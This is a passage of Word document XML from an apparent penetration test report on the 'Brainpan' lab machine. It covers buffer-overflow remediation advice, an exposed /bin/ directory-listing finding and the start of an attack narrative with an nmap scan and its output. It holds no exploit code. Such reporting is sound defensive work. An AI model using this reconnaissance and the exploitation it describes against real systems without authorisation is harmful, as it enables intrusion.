      <w:tr w:rsidR="00D102BD" w:rsidRPr="00D102BD" w14:paraId="5EAD6462" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="635D1DE4" w14:textId="337B6BA0" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="00D47754" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6471C70F" w14:textId="77777777" w:rsidR="00514716" w:rsidRDefault="00B33AD2" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Implement proper bounds checking by using</w:t>
            </w:r>
            <w:r w:rsidR="00A732EA">
              <w:t xml:space="preserve"> a secure function like</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>fgets</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) instead of gets()</w:t>
            </w:r>
            <w:r w:rsidR="00611A4A">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BAC357" w14:textId="77777777" w:rsidR="00514716" w:rsidRDefault="00514716" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="378CD453" w14:textId="7BEE72E5" w:rsidR="00514716" w:rsidRDefault="005B4E04" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Enable A</w:t>
            </w:r>
            <w:r w:rsidR="002F6A1F">
              <w:t>ddress Space Layout Randomization (ASLR)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to make exploitation of </w:t>
            </w:r>
            <w:r w:rsidR="002F6A1F">
              <w:t>any potential buffer overflow tougher.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFC33F5" w14:textId="4DB1C2D9" w:rsidR="002F6A1F" w:rsidRDefault="002F6A1F" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3E8DF4" w14:textId="77777777" w:rsidR="00BD5C2D" w:rsidRDefault="002F6A1F" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Enable No-Execute (NX) to make the stack non-executable, creating more hurdles for an attacker to bypass in the case of a potential buffer overflow.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C1AA42" w14:textId="77777777" w:rsidR="00514716" w:rsidRDefault="00514716" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0650A3ED" w14:textId="30BA57A9" w:rsidR="00A77ABE" w:rsidRPr="00D102BD" w:rsidRDefault="00BD5C2D" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Enable Stack Canaries to allow the program to be able to detect an attempted buffer overflow attack a</w:t>
            </w:r>
            <w:r w:rsidR="006868CE">
              <w:t xml:space="preserve">nd consequently terminate itself before </w:t>
            </w:r>
            <w:r w:rsidR="00201ED1">
              <w:t>any damage</w:t>
            </w:r>
            <w:r w:rsidR="006868CE">
              <w:t xml:space="preserve"> can be achieved by the attacker.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D102BD" w:rsidRPr="00D102BD" w14:paraId="7491A0E4" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF0E0AA" w14:textId="0C513E42" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="000270B9" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2597BBCB" w14:textId="77777777" w:rsidR="00D102BD" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00885816" w:rsidRPr="00885816">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://csrc.nist.gov/glossary/term/buffer_overflow</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2CF0B1C3" w14:textId="77777777" w:rsidR="00201ED1" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00201ED1" w:rsidRPr="00201ED1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://docs.oracle.com/en/operating-systems/oracle-linux/6/security/ol_aslr_sec.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0EAA4CB0" w14:textId="77777777" w:rsidR="00201ED1" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidR="00201ED1" w:rsidRPr="00201ED1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://access.redhat.com/solutions/2936741</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0C2CB2C2" w14:textId="77777777" w:rsidR="00201ED1" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidR="00201ED1" w:rsidRPr="00201ED1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://developers.redhat.com/articles/2022/06/02/use-compiler-flags-stack-protection-gcc-and-clang</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7FE7A428" w14:textId="0FF5CDB4" w:rsidR="00201ED1" w:rsidRPr="00D102BD" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidR="00201ED1" w:rsidRPr="00201ED1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.cobalt.io/blog/pentester-guide-to-exploiting-buffer-overflow-vulnerabilities</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A079AB5" w14:textId="77777777" w:rsidR="00A322DA" w:rsidRDefault="00A322DA" w:rsidP="00B20DAE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFDD388" w14:textId="52D254AF" w:rsidR="00B20DAE" w:rsidRPr="00B20DAE" w:rsidRDefault="00B20DAE" w:rsidP="00B20DAE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20DAE">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Security Misconfiguration - Exposed Directory Listing (/bin/)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1615"/>
        <w:gridCol w:w="9175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B20DAE" w14:paraId="3466C108" w14:textId="77777777" w:rsidTr="00B20DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73EBCE18" w14:textId="53523B80" w:rsidR="00B20DAE" w:rsidRDefault="00B20DAE" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Severity:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="384E718B" w14:textId="2BDA0616" w:rsidR="00B20DAE" w:rsidRDefault="00B20DAE" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B20DAE" w14:paraId="0913E3B2" w14:textId="77777777" w:rsidTr="00B20DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65081A15" w14:textId="561E8B98" w:rsidR="00B20DAE" w:rsidRDefault="00B20DAE" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9175" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D099BD" w14:textId="54F47669" w:rsidR="00B20DAE" w:rsidRDefault="00A0535C" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>An exposed directory listing (/bin/) is present on the target machine</w:t>
            </w:r>
            <w:r>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:t>s (</w:t>
            </w:r>
            <w:r w:rsidRPr="008416F6">
              <w:t>10.10.233.5</w:t>
            </w:r>
            <w:r>
              <w:t>) webserver which contains brainpan.exe, the binary running on port 9999 on the target machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F612796" w14:textId="77777777" w:rsidR="003B6416" w:rsidRDefault="003B6416" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02DD9117" w14:textId="3E75A934" w:rsidR="00C417A7" w:rsidRDefault="00C417A7" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This exposed directory listing allowed our team to reverse engineer and consequently exploit </w:t>
            </w:r>
            <w:r w:rsidR="00131CB3">
              <w:t xml:space="preserve">the service </w:t>
            </w:r>
            <w:r w:rsidR="00E7283A">
              <w:t>on port 9999</w:t>
            </w:r>
            <w:r w:rsidR="009E5628">
              <w:t xml:space="preserve"> (see finding #2)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, leading to initial access </w:t>
            </w:r>
            <w:r w:rsidR="009E5628">
              <w:t>to the server.</w:t>
            </w:r>
            <w:r w:rsidR="009143A8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B20DAE" w14:paraId="2B5A5BAB" w14:textId="77777777" w:rsidTr="00B20DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B12C9F4" w14:textId="3928AB6E" w:rsidR="00B20DAE" w:rsidRDefault="0001289A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9175" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429C1F88" w14:textId="15A0F809" w:rsidR="00B20DAE" w:rsidRDefault="0001289A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Likelihood:</w:t>
            </w:r>
            <w:r w:rsidR="00101F14">
              <w:t xml:space="preserve"> Very High </w:t>
            </w:r>
            <w:r w:rsidR="00101F14">
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00101F14">
              <w:t xml:space="preserve"> Finding and accessing an exposed directory listing is trivial and can be done easily by unsophisticated attackers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5096D514" w14:textId="77777777" w:rsidR="003B6416" w:rsidRDefault="003B6416" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7ADA7F80" w14:textId="59460D4D" w:rsidR="0001289A" w:rsidRDefault="0001289A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact:</w:t>
            </w:r>
            <w:r w:rsidR="000B6B62">
              <w:t xml:space="preserve"> Moderate </w:t>
            </w:r>
            <w:r w:rsidR="0086346A">
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="000B6B62">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0086346A">
              <w:t>Exposed sensitive directory listings can provide attackers with source code or other information to devise exploits against systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B20DAE" w14:paraId="3CC71F16" w14:textId="77777777" w:rsidTr="00B20DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447B86DD" w14:textId="1FD04D15" w:rsidR="00B20DAE" w:rsidRDefault="0001289A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9175" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F19AA9" w14:textId="1ACEB320" w:rsidR="00B20DAE" w:rsidRDefault="0086346A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Disable </w:t>
            </w:r>
            <w:r w:rsidR="000A2BD6">
              <w:t>directory listing</w:t>
            </w:r>
            <w:r w:rsidR="0035291D">
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="000A2BD6">
              <w:t xml:space="preserve"> for all directories that are either sensitive or not necessary for a user to access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B20DAE" w14:paraId="429F69BD" w14:textId="77777777" w:rsidTr="00B20DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E53175E" w14:textId="7DBB3C33" w:rsidR="0001289A" w:rsidRDefault="0001289A" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9175" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AC5303" w14:textId="77777777" w:rsidR="00B20DAE" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidR="0093525D" w:rsidRPr="0093525D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/548.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="74B443F1" w14:textId="7886CF4A" w:rsidR="0093525D" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidR="0093525D" w:rsidRPr="0093525D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://portswigger.net/kb/issues/00600100_directory-listing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66F13141" w14:textId="1C0AA247" w:rsidR="3EFF00EC" w:rsidRDefault="0001289A" w:rsidP="0001289A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc141061107"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Narrative</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4A3F181D" w14:textId="31A8FA3E" w:rsidR="005E53A2" w:rsidRDefault="00A44886" w:rsidP="0087064E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc141061108"/>
      <w:r>
        <w:t xml:space="preserve">Enumerating the Webserver (port </w:t>
      </w:r>
      <w:r w:rsidR="004E1FC0">
        <w:t>10,000</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="05CBD8A3" w14:textId="70018E3A" w:rsidR="004E1FC0" w:rsidRPr="004E1FC0" w:rsidRDefault="004E1FC0" w:rsidP="004E1FC0">
      <w:r w:rsidRPr="00F7085C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Running an Nmap scan on the server reveals the following two ports are open</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE6F3C"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Nmap 7.93 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>scan initiated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tue Jun 13 19:26:07 2023 as: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -p9999,10000 -T4 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> service-scan.txt 10.10.233.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E4B14"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Nmap scan report for 10.10.233.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000328E5"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Host is up (0.13s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14447897"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2F075"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PORT      STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F7143"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9999/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  abyss?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88F4BD"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fingerprint-strings: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21CD3E"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NULL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB85C2"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_| _| </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED75332"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_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F7856"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_|_| _| _| _| _| _| _| _| _| _| _| _|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8468C"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_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31173164"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  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>________________________ WELCOME TO BRAINPAN _________________________]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE9C92"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|_    ENTER THE PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5985AC"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10000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.6 (Python 2.7.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A0241" w14:textId="77777777" w:rsidR="00995644" w:rsidRP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 xml:space="preserve">|_http-server-header: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SimpleHTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/0.6 Python/2.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5719A" w14:textId="77777777" w:rsidR="00995644" w:rsidRDefault="00995644" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00995644">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>|_http-title: Site doesn't have a title (text/html).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221CC475" w14:textId="77777777" w:rsidR="002242E5" w:rsidRDefault="002242E5" w:rsidP="00995644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
